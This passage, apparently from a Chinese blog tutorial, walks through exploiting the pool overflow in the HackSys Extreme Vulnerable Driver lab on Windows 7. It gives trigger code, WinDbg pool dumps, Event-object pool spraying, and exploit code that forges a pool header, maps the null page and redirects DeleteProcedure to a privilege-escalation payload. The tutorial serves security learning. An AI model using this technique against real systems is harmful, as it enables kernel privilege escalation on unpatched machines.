class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line">    HANDLE hevDevice;</span><br><span class="line">    ULONG BytesReturned;</span><br><span class="line"></span><br><span class="line">    hevDevice = (HANDLE)CreateFileA(<span class="string">&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;</span>, <span class="number">0xC0000000</span>, <span class="number">0</span>, <span class="literal">NULL</span>, <span class="number">0x3</span>, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">if</span>(!hevDevice || hevDevice == (HANDLE)<span class="number">-1</span>)</span><br><span class="line">    {</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;*** Couldn&apos;t get Device Driver handle&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">100</span>];</span><br><span class="line">    <span class="keyword">int</span> bufLength = <span class="number">100</span>;</span><br><span class="line"></span><br><span class="line">    DeviceIoControl(hevDevice, <span class="number">0x22200f</span>, buf, bufLength, <span class="literal">NULL</span>, <span class="number">0</span>, &amp;BytesReturned, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x5185;&#x6838;&#x8F93;&#x51FA;&#x4FE1;&#x606F;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/2.png" alt="img"></p>
<p>&#x8FDB;&#x5165;&#x89E6;&#x53D1;&#x6F0F;&#x6D1E;&#x51FD;&#x6570;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6C60;&#x6807;&#x8BB0;&#x201C;Hack&#x201D;&#xFF0C;&#x5927;&#x5C0F;&#x4E3A;0x1F8&#x3002;</p>
<p>&#x5C1D;&#x8BD5;&#x7ED9;UserBuffer&#x5206;&#x914D;0x1f8&#x5B57;&#x8282;&#x5927;&#x5C0F;&#xFF0C;</p>
<p><img src="/2019/08/03/20190803-1/3.png" alt="img"></p>
<p>&#x73B0;&#x5728;&#x4E0D;&#x5E94;&#x8BE5;&#x7834;&#x574F;&#x76F8;&#x90BB;&#x7684;&#x5185;&#x5B58;&#x5757;&#xFF0C;&#x56E0;&#x4E3A;&#x73B0;&#x5728;<code>UserBuffer</code>&#x7684;&#x503C;&#x4E3A;&#x8FB9;&#x754C;&#x503C;&#xFF0C;&#x6765;&#x5206;&#x6790;&#x4E00;&#x4E0B;&#x6C60;&#xFF1A;</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">kd&gt; !pool <span class="number">0</span>x86D254F0</span><br><span class="line">Pool page <span class="number">86</span>d254f0 region is Nonpaged pool</span><br><span class="line"> <span class="number">86</span>d25000 <span class="keyword">size</span>:  <span class="number">2</span>e8 <span class="keyword">previous</span> <span class="keyword">size</span>:    <span class="number">0</span>  (Allocated)  Thre (<span class="keyword">Protected</span>)</span><br><span class="line"> <span class="number">86</span>d252e8 <span class="keyword">size</span>:    <span class="number">8</span> <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">2</span>e8  (Free)       ....</span><br><span class="line"> <span class="number">86</span>d252f0 <span class="keyword">size</span>:   <span class="number">48</span> <span class="keyword">previous</span> <span class="keyword">size</span>:    <span class="number">8</span>  (Allocated)  Vad </span><br><span class="line"> <span class="number">86</span>d25338 <span class="keyword">size</span>:   <span class="number">50</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">48</span>  (Allocated)  Vadm</span><br><span class="line"> <span class="number">86</span>d25388 <span class="keyword">size</span>:   <span class="number">50</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">50</span>  (Allocated)  Vadm</span><br><span class="line"> <span class="number">86</span>d253d8 <span class="keyword">size</span>:    <span class="number">8</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">50</span>  (Free)       VM3D</span><br><span class="line"> <span class="number">86</span>d253e0 <span class="keyword">size</span>:   c8 <span class="keyword">previous</span> <span class="keyword">size</span>:    <span class="number">8</span>  (Allocated)  VM3D</span><br><span class="line"> <span class="number">86</span>d254a8 <span class="keyword">size</span>:   <span class="number">40</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   c8  (Free )  Even (<span class="keyword">Protected</span>)</span><br><span class="line">*<span class="number">86</span>d254e8 <span class="keyword">size</span>:  <span class="number">200</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">40</span>  (Allocated) *Hack</span><br><span class="line">        Owning component : Unknown (update pooltag.txt)</span><br><span class="line"> <span class="number">86</span>d256e8 <span class="keyword">size</span>:  <span class="number">128</span> <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">200</span>  (Allocated)  Ntfi</span><br><span class="line"> <span class="number">86</span>d25810 <span class="keyword">size</span>:   b8 <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">128</span>  (Allocated)  <span class="keyword">File</span> (<span class="keyword">Protected</span>)</span><br><span class="line"> <span class="number">86</span>d258c8 <span class="keyword">size</span>:   <span class="number">30</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   b8  (Free)       CcSc</span><br><span class="line"> <span class="number">86</span>d258f8 <span class="keyword">size</span>:  <span class="number">138</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">30</span>  (Allocated)  ALPC (<span class="keyword">Protected</span>)</span><br><span class="line"> <span class="number">86</span>d25a30 <span class="keyword">size</span>:   b8 <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">138</span>  (Allocated)  <span class="keyword">File</span> (<span class="keyword">Protected</span>)</span><br><span class="line"> <span class="number">86</span>d25ae8 <span class="keyword">size</span>:   <span class="number">40</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   b8  (Free)       CcSc</span><br><span class="line"> <span class="number">86</span>d25b28 <span class="keyword">size</span>:  <span class="number">128</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   <span class="number">40</span>  (Allocated)  Ntfi</span><br><span class="line"> <span class="number">86</span>d25c50 <span class="keyword">size</span>:   b8 <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">128</span>  (Allocated)  <span class="keyword">File</span> (<span class="keyword">Protected</span>)</span><br><span class="line"> <span class="number">86</span>d25d08 <span class="keyword">size</span>:  <span class="number">230</span> <span class="keyword">previous</span> <span class="keyword">size</span>:   b8  (Free)       Irp </span><br><span class="line"> <span class="number">86</span>d25f38 <span class="keyword">size</span>:   c8 <span class="keyword">previous</span> <span class="keyword">size</span>:  <span class="number">230</span>  (Allocated)  Time (<span class="keyword">Protected</span>)</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x7528;KernelBuffer&#x88AB;&#x5B8C;&#x7F8E;&#x5206;&#x914D;&#xFF0C;&#x7ED3;&#x675F;&#x5730;&#x5740;&#x4E3A;&#x4E0B;&#x4E00;&#x6C60;&#x5757;&#x8D77;&#x59CB;&#x5730;&#x5740;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/4.png" alt="img"></p>
<p>&#x6EA2;&#x51FA;&#x4F1A;&#x662F;&#x81F4;&#x547D;&#x6027;&#x7684;&#xFF0C;&#x5C06;&#x76F4;&#x63A5;&#x5BFC;&#x81F4;&#x7CFB;&#x7EDF;&#x84DD;&#x5C4F;&#x5D29;&#x6E83;&#xFF0C;&#x7834;&#x574F;&#x4E86;&#x76F8;&#x90BB;&#x7684;&#x6C60;&#x5757;&#x5934;&#x90E8;&#x3002;</p>
<p><img src="/2019/08/03/20190803-1/5.png" alt="img"></p>
<p><img src="/2019/08/03/20190803-1/6.png" alt="img"></p>
<p>&#x6211;&#x4EEC;&#x5982;&#x4F55;&#x80FD;&#x591F;&#x901A;&#x8FC7;&#x6EA2;&#x51FA;&#x63A7;&#x5236;&#x76F8;&#x90BB;&#x7684;&#x5934;&#x90E8;&#x3002;&#x6211;&#x4EEC;&#x5229;&#x7528;&#x7684;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x53EF;&#x4EE5;&#x4EE5;&#x4FEE;&#x6539;&#x6C60;&#x7684;&#x65B9;&#x5F0F;&#x6765;&#x4F7F;&#x5F97;&#x6C60;&#x4E0D;&#x518D;&#x968F;&#x673A;&#x5316;&#x3002;&#x6B64;&#x524D;&#x8BA8;&#x8BBA;&#x7684; <code>CreateEvent</code> API &#x53EF;&#x4EE5;&#x80DC;&#x4EFB;&#x8FD9;&#x4E2A;&#x5DE5;&#x4F5C;&#xFF0C;&#x5B83;&#x7684;&#x5927;&#x5C0F;&#x4E3A;0x40&#x4E2A;&#x5B57;&#x8282;&#xFF0C;&#x6B63;&#x597D;&#x53EF;&#x4EE5;&#x5339;&#x914D;&#x6C60;&#x7684;&#x5927;&#x5C0F;0x200&#x4E2A;&#x5B57;&#x8282;&#x3002;</p>
<p>&#x55B7;&#x5C04;&#x5927;&#x91CF;<code>Event</code>&#x5BF9;&#x8C61;&#xFF0C;&#x628A;&#x5B83;&#x4EEC;&#x7684;&#x53E5;&#x67C4;&#x5B58;&#x50A8;&#x5728;&#x6570;&#x7EC4;&#x4E2D;&#xFF0C;&#x5177;&#x4F53;&#x770B;&#x4E00;&#x4E0B;&#x8FC7;&#x7A0B;&#xFF1A;</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) </span><br><span class="line"> {</span><br><span class="line">        EventObjectArrayA[i] = CreateEvent(NULL, FALSE, FALSE, NULL);</span><br><span class="line">        <span class="keyword">if</span> (!EventObjectArrayA[i]) </span><br><span class="line">        {</span><br><span class="line">            DEBUG_ERROR(<span class="string">&quot;\t\t[-] Failed To Allocate Event Objects: 0x%X\n&quot;</span>, GetLastError());</span><br><span class="line">            <span class="keyword">exit</span>(EXIT_FAILURE);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">5000</span>; i++)</span><br><span class="line">    {</span><br><span class="line">        EventObjectArrayB[i] = CreateEvent(NULL, FALSE, FALSE, NULL);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!EventObjectArrayB[i]) {</span><br><span class="line">            DEBUG_ERROR(<span class="string">&quot;\t\t[-] Failed To Allocate Event Objects: 0x%X\n&quot;</span>, GetLastError());</span><br><span class="line">            <span class="keyword">exit</span>(EXIT_FAILURE);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">5000</span>; i += <span class="number">16</span>) {</span><br><span class="line">        <span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; <span class="number">8</span>; j++) {</span><br><span class="line">            <span class="keyword">if</span> (!CloseHandle(EventObjectArrayB[i + j])) {</span><br><span class="line">                DEBUG_ERROR(<span class="string">&quot;\t\t[-] Failed To Close Event Objects Handle: 0x%X\n&quot;</span>, GetLastError());</span><br><span class="line">                <span class="keyword">exit</span>(EXIT_FAILURE);</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br></pre></td></tr></table></figure>

<p>&#x4E3B;&#x51FD;&#x6570;&#x4EE3;&#x7801;</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line">__try {</span><br><span class="line">      <span class="comment">// Get the device handle</span></span><br><span class="line">      DEBUG_MESSAGE(<span class="string">&quot;<span class="subst">\t</span>[+] Getting Device Driver Handle<span class="subst">\n</span>&quot;</span>);</span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Device Name: %s<span class="subst">\n</span>&quot;</span>, FileName);</span><br><span class="line"></span><br><span class="line">      hFile = GetDeviceHandle(FileName);</span><br><span class="line"></span><br><span class="line">      if (hFile == INVALID_HANDLE_VALUE) {</span><br><span class="line">          DEBUG_ERROR(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[-] Failed Getting Device Handle: 0x%X<span class="subst">\n</span>&quot;</span>, GetLastError());</span><br><span class="line">          exit(EXIT_FAILURE);</span><br><span class="line">      }</span><br><span class="line">      else {</span><br><span class="line">          DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Device Handle: 0x%X<span class="subst">\n</span>&quot;</span>, hFile);</span><br><span class="line">      }</span><br><span class="line"></span><br><span class="line">      DEBUG_MESSAGE(<span class="string">&quot;<span class="subst">\t</span>[+] Setting Up Vulnerability Stage<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Allocating Memory For Buffer<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Allocate the Heap chunk</span></span><br><span class="line">      UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),</span><br><span class="line">                                         HEAP_ZERO_MEMORY,</span><br><span class="line">                                         UserModeBufferSize);</span><br><span class="line"></span><br><span class="line">      if (!UserModeBuffer) {</span><br><span class="line">          DEBUG_ERROR(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[-] Failed To Allocate Memory: 0x%X<span class="subst">\n</span>&quot;</span>, GetLastError());</span><br><span class="line">          exit(EXIT_FAILURE);</span><br><span class="line">      }</span><br><span class="line">      else {</span><br><span class="line">          DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] Memory Allocated: 0x%p<span class="subst">\n</span>&quot;</span>, UserModeBuffer);</span><br><span class="line">          DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] Allocation Size: 0x%X<span class="subst">\n</span>&quot;</span>, UserModeBufferSize);</span><br><span class="line">      }</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Mapping Null Page<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      if (!MapNullPage()) {</span><br><span class="line">          DEBUG_ERROR(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[-] Failed Mapping Null Page: 0x%X<span class="subst">\n</span>&quot;</span>, GetLastError());</span><br><span class="line">          exit(EXIT_FAILURE);</span><br><span class="line">      }</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Preparing Buffer Memory Layout<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, <span class="number">0x41</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Restore POOL_HEADER and set TypeIndex to 0x00 (TypeIndex is UChar)</span></span><br><span class="line">      Memory = (PVOID)((ULONG)UserModeBuffer + (ULONG)POOL_BUFFER_SIZE);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x04080040</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0xee657645</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000040</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000001</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000001</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">      Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">      *(PULONG)Memory = (ULONG)<span class="number">0x00080000</span>;</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] TypeIndex Of Event Object Set To: 0x0<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Preparing OBJECT_TYPE_INITIALIZER At Null Page<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Set the DeleteProcedure to the address of our payload</span></span><br><span class="line">      *(PULONG)<span class="number">0x00000060</span> = (ULONG)EopPayload;</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] DeleteProcedure: 0x%X<span class="subst">\n</span>&quot;</span>, *(PULONG)<span class="number">0x00000060</span>);</span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] DeleteProcedure Address: 0x%p<span class="subst">\n</span>&quot;</span>, (ULONG)<span class="number">0x00000060</span>);</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] EoP Payload: 0x%p<span class="subst">\n</span>&quot;</span>, EopPayload);</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span>[+] Preparing NonPaged Kernel Pool Layout<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] Spraying With Event Objects<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Spray the NonPaged Pool</span></span><br><span class="line">      SprayNonPagedPoolWithEventObjects();</span><br><span class="line"></span><br><span class="line">      DEBUG_INFO(<span class="string">&quot;<span class="subst">\t</span><span class="subst">\t</span><span class="subst">\t</span>[+] Creating Holes By Coalescing<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Create the holes for the vulnerable buffer</span></span><br><span class="line">      CreateHolesInNonPagedPoolByCoalescingEventObjects();</span><br><span class="line"></span><br><span class="line">      DEBUG_MESSAGE(<span class="string">&quot;<span class="subst">\t</span>[+] Triggering Pool Overflow<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      OutputDebugString(<span class="string">&quot;****************Kernel Mode****************<span class="subst">\n</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// Allocate the vulnerable buffer in one of the holes we created</span></span><br><span class="line">      DeviceIoControl(hFile,</span><br><span class="line">                      HACKSYS_EVD_IOCTL_POOL_OVERFLOW,</span><br><span class="line">                      (LPVOID)UserModeBuffer,</span><br><span class="line">                      (DWORD)UserModeBufferSize,</span><br><span class="line">                      NULL,</span><br><span class="line">                      <span class="number">0</span>,</span><br><span class="line">                      &amp;BytesReturned,</span><br><span class="line">                      NULL);</span><br></pre></td></tr></table></figure>

<p><img src="/2019/08/03/20190803-1/7.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x6211;&#x4EEC;&#x7684;<code>Event</code>&#x5BF9;&#x8C61;&#x88AB;&#x55B7;&#x5C04;&#x5230;&#x975E;&#x5206;&#x9875;&#x6C60;&#x4E2D;&#xFF0C;&#x73B0;&#x5728;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x5728;&#x8FD9;&#x4E9B;&#x5185;&#x5B58;&#x5757;&#x521B;&#x9020;&#x4E00;&#x4E9B;&#x7A7A;&#x9699;&#xFF0C;&#x7136;&#x540E;&#x628A;&#x6211;&#x4EEC;&#x6709;&#x6F0F;&#x6D1E;&#x7684;Hack&#x7F13;&#x51B2;&#x533A;&#x91CD;&#x65B0;&#x5206;&#x914D;&#x5230;&#x8FD9;&#x4E9B;&#x7A7A;&#x9699;&#x4E2D;&#x3002;&#x5728;&#x91CD;&#x65B0;&#x5206;&#x914D;&#x6709;&#x6F0F;&#x6D1E;&#x7684;&#x7F13;&#x51B2;&#x533A;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x7834;&#x574F;&#x76F8;&#x90BB;&#x7684;&#x6C60;&#x5934;&#x90E8;&#xFF0C;&#x4EE5;&#x6307;&#x5411;&#x6211;&#x4EEC;&#x7684;shellcode&#x5730;&#x5740;&#x3002;<code>Event</code>&#x5BF9;&#x8C61;&#x7684;&#x5927;&#x5C0F;&#x4E3A;0x40&#x4E2A;&#x5B57;&#x8282;&#xFF08;0x38+0x8&#xFF09;&#xFF0C;&#x5305;&#x62EC;&#x6C60;&#x5934;&#x90E8;&#x3002;</p>
<p>&#x6765;&#x5206;&#x6790;&#x4E00;&#x4E0B;&#x5934;&#x90E8;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/8.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x7531;&#x4E8E;<code>Event</code>&#x5BF9;&#x8C61;&#x88AB;&#x55B7;&#x5C04;&#x5230;&#x975E;&#x5206;&#x9875;&#x6C60;&#x4E2D;&#xFF0C;&#x6240;&#x4EE5;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5C06;&#x8FD9;&#x4E9B;&#x503C;&#x52A0;&#x5230;&#x7F13;&#x51B2;&#x533A;&#x672B;&#x5C3E;&#xFF0C;&#x6765;&#x5B9E;&#x73B0;&#x5229;&#x7528;&#x3002;&#x4F46;&#x662F;&#xFF0C;&#x7B80;&#x5355;&#x8FD9;&#x6837;&#x505A;&#x662F;&#x884C;&#x4E0D;&#x901A;&#x7684;&#xFF0C;&#x6211;&#x4EEC;&#x6765;&#x7814;&#x7A76;&#x4E0B;&#x5934;&#x90E8;&#x7684;&#x6570;&#x636E;&#x7ED3;&#x6784;&#xFF0C;&#x518D;&#x7A0D;&#x4F5C;&#x4FEE;&#x6539;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/9.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x6211;&#x4EEC;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x90E8;&#x5206;&#x662F;<code>TypeIndex</code> &#xFF0C;&#x5B83;&#x5B9E;&#x9645;&#x4E0A;&#x662F;&#x6307;&#x9488;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x504F;&#x79FB;&#x91CF;&#x5927;&#x5C0F;&#xFF0C;&#x5B83;&#x5B9A;&#x4E49;&#x4E86;Windows&#x6240;&#x652F;&#x6301;&#x7684;&#x6BCF;&#x4E2A;&#x5BF9;&#x8C61;&#x7684;<code>OBJECT_TYPE</code>&#xFF0C;&#x6765;&#x5206;&#x6790;&#x4E00;&#x4E0B;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/10.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x8FD9;&#x770B;&#x8D77;&#x6765;&#x53EF;&#x80FD;&#x6709;&#x70B9;&#x590D;&#x6742;&#xFF0C;&#x4F46;&#x6211;&#x5DF2;&#x7ECF;&#x6807;&#x8BB0;&#x51FA;&#x4E86;&#x91CD;&#x8981;&#x7684;&#x90E8;&#x5206;&#xFF1A;</p>
<p>&#x7B2C;&#x4E00;&#x4E2A;&#x6307;&#x9488;&#x662F; <code>00000000</code>&#xFF0C;&#x5728;Windows 7&#x4E0B;&#x975E;&#x5E38;&#x91CD;&#x8981;&#xFF08;&#x4E0B;&#x9762;&#x89E3;&#x91CA;&#xFF09;&#xFF1B;&#x4E0B;&#x4E00;&#x4E2A;&#x7A81;&#x51FA;&#x663E;&#x793A;&#x7684;&#x6307;&#x9488;&#x662F; <code>85f05418</code>&#xFF0C; &#x8FD9;&#x662F;&#x4ECE;0xc&#x4E2A;&#x6570;&#x7EC4;&#x5143;&#x7D20;&#x5F00;&#x59CB;&#x7684;&#x504F;&#x79FB;&#x91CF;&#xFF1B;&#x5206;&#x6790;&#x5230;&#x8FD9;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x8FD9;&#x662F;<code>Event</code>&#x5BF9;&#x8C61;&#x7C7B;&#x578B;&#xFF1B;&#x73B0;&#x5728;&#x6700;&#x6709;&#x8DA3;&#x7684;&#x662F;&#x504F;&#x79FB;&#x91CF;0x28 